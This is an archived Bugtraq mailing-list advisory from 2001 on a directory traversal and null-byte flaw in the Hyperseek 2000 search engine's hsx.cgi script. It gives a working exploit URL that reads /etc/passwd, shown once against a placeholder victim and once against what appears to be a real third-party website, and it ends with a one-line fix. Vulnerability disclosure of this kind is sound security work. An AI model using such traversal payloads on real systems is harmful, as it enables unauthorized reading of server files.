[18844] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Hyperseek 2000 Search Engine - "show directory & files" bug

daemon@ATHENA.MIT.EDU (MC GaN)
Mon Jan 29 03:03:05 2001

Mime-Version: 1.0
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 8bit
Message-Id:  <E14MmGa-0001iD-00@f11.mail.ru>
Date:         Sun, 28 Jan 2001 10:28:52 +0300
Reply-To: MC GaN <vipersv@mail.ru>
From: MC GaN <vipersv@MAIL.RU>
To: BUGTRAQ@SECURITYFOCUS.COM

              --== NerF security gr0up advisory ==--
--------------------------------------------------------------------
Hyperseek 2000 Search Engine - "show directory & files" bug.
--------------------------------------------------------------------

1. Standart perl problem is in statistic module - file: hsx.cgi, script does not filter ../ and %00. Through this bug, you can remotely read any file and make listing of directory. ../ - directory up, %00 hex symbol, that means end of line.

2. Exploit url:
http://www.victim.ru/cgi-bin/hsx.cgi?show=../../../../../../etc/passwd%00
Note: directory can change and amount of ../ can vary.

3. Example:
http://www.netsurprise.de/cgi-bin/suche/hsx.cgi?show=../../../../../../../etc/passwd%00

4. Filter symbols like:
$dat=~ s/\0//g;

--------------------------------------------------------------------
NerF security gr0up (Russia) - www.nerf.f2s.com


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[18844] in bugtraq

Hyperseek 2000 Search Engine - "show directory & files" bug

daemon@ATHENA.MIT.EDU (MC GaN)Mon Jan 29 03:03:05 2001

daemon@ATHENA.MIT.EDU (MC GaN)
Mon Jan 29 03:03:05 2001